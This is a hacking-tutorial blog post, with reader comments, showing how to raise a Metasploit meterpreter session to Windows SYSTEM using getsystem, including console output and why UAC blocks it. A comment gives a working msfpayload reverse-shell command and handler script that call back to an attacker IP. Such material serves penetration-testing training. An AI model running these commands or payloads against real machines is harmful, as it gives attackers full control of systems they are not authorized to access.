Privilege Escalation in Metasploit Meterpreter (Backtrack 5)

Type : Tips and Trick

Level : Easy

What is privilege escalation?

According to Wikipedia, privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Sometimes, when you exploit a security hole and succeed in getting access to the target system, you only act as the user who is logged in, not as the local SYSTEM account. This tip shows a simple step to escalate your privileges from inside meterpreter. I have tested it from Backtrack 5 against Windows XP SP3 and Windows 7 SP0.

The screenshot below was taken after gaining access with the Java Signed Applet Social Engineering Toolkit Code Execution exploit.

[Screenshot: meterpreter session opened by the Java signed applet exploit]

When we run the getuid command, we see that we are running as the user who is logged in to the system, not as the SYSTEM account. How do we escalate to SYSTEM? Run the help command in your meterpreter console and look at the commands listed under the Priv extension.

[Screenshot: meterpreter help output, Priv extension commands]

That's it: the getsystem command tries each of its elevation techniques in turn (getsystem -h lists them and -t picks one) until the session runs as local SYSTEM, and from there you control everything. Run getuid again afterwards to confirm that the server username is now NT AUTHORITY\SYSTEM.

[Screenshot: getsystem output followed by getuid showing NT AUTHORITY\SYSTEM]

Hope you enjoyed :-)

FYI: I tried getsystem on Windows 7 SP1 and it did not work. (Update: whether it works depends on the vulnerability and exploit you use.) The reason is that the three service-based techniques need the session to already hold administrative rights; on Windows 7 with UAC enabled, even an administrator's session obtained through a client-side exploit carries a filtered, medium-integrity token, so they are refused with "Access is denied", and the KiTrap0D technique (MS10-015) only works on an unpatched host. An exploit that already runs as SYSTEM, or a payload started from an elevated process, gives getsystem what it needs.
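The whole sequence in one place, as an added example that is not from the original post: a constructed meterpreter session against a lab Windows XP SP3 host, followed by the same commands against a Windows 7 host with UAC enabled. Host names, user names, the exact sysinfo lines and the shortened win_privs table are assumptions; the getsystem option list and its messages are as the BT5-era Metasploit prints them.

```console
meterpreter > getuid
Server username: WINXP\user
meterpreter > sysinfo
Computer: WINXP
OS      : Windows XP (Build 2600, Service Pack 3).
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
                0 : All techniques available
                1 : Service - Named Pipe Impersonation (In Memory/Admin)
                2 : Service - Named Pipe Impersonation (Dropper/Admin)
                3 : Service - Token Duplication (In Memory/Admin)
                4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

# --- Same check on a patched Windows 7 host; the user is in Administrators
# --- but the session runs under UAC with a medium-integrity (filtered) token.
meterpreter > getuid
Server username: WIN7\user
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getuid
Server username: WIN7\user
meterpreter > run post/windows/gather/win_privs
Current User Privileges
  Is Admin  Is System  Is In Admin Group  UAC Enabled  UID
  False     False      True               True         WIN7\user
```

The post/windows/gather/win_privs module is the quickest way to tell the two situations apart: "Is In Admin Group: True" with "Is Admin: False" and "UAC Enabled: True" means the token is filtered, and no getsystem technique will succeed until the session is elevated (later Metasploit releases added exploit/windows/local/bypassuac for that step). If getsystem keeps failing on a host where the user is a plain non-admin, the fix is a separate local privilege escalation exploit, not another getsystem attempt.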

Written by Vishnu Valentino.

Founder of hacking-tutorial.com. Loves PHP, offensive security and the web. Contact him at me[-at-]vishnuvalentino.com

Visit Website: http://www.vishnuvalentino.com

4 Responses to "Privilege Escalation in Metasploit Meterpreter (Backtrack 5)"

  1. hitesh says:

    Hi,
    I have tried to use Metasploit many times, but every time I get the error "exploit completed but no session was created". Please help me. My OS is XP SP3 and the remote system's OS is also XP SP3.
    My firewall is off and my antivirus is also off. Please help me.
    Thanks

  2. Himanshu says:

    I cracked a fully patched Win 7 with fully updated Microsoft Security Essentials and got SYSTEM by technique 1.
    If you do it just by getsystem it won't work, but if you run a meterpreter script it will open a new session, and then if you do getsystem it will work.

    • v4L says:

      #Himanshu
      Thanks for your input; by the way, I forgot to remove the last line of this tutorial :-) Whether getsystem works depends on which exploit you use.
      And also, if you think a meterpreter script will work, which script did you use? If you use:
      # LHOST/LPORT must point at the handler below (it listens on 192.168.1.184:4444); X writes a Windows executable
      root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.184 LPORT=4444 X > Meterpreter.exe
      and then execute Meterpreter.exe on the victim (Windows 7 SP1) and handle it with this resource script:
      root@bt:~# cat meterpreter.rc
      # generic handler for the reverse_tcp meterpreter stager; PAYLOAD, LHOST and LPORT must match what was baked into Meterpreter.exe
      use exploit/multi/handler
      set PAYLOAD windows/meterpreter/reverse_tcp
      set LHOST 192.168.1.184
      set LPORT 4444
      # keep the handler listening for further connections after the first session opens
      set ExitOnSession false
      # run as a background job (-j) and do not interact with the session automatically (-z)
      exploit -j -z

      yes, you can do it, because you made the connection yourself, not from some vulnerability that you exploited…

      I think it's the same as executing netcat or rcat from the victim and having your BT5 handle the connection. http://www.hacking-tutorial.com/hacking-tutorial/10-steps-to-use-netcat-as-a-backdoor-in-windows-7-system/

Trackbacks/Pingbacks

  1. 10 Steps to Use NetCat as a Backdoor in Windows 7 System | Vishnu Valentino Hacking Tutorial, Tips and Trick - [...] When it failed to upload(look the picture above), you need to escalate your privilege to system account (view the ...
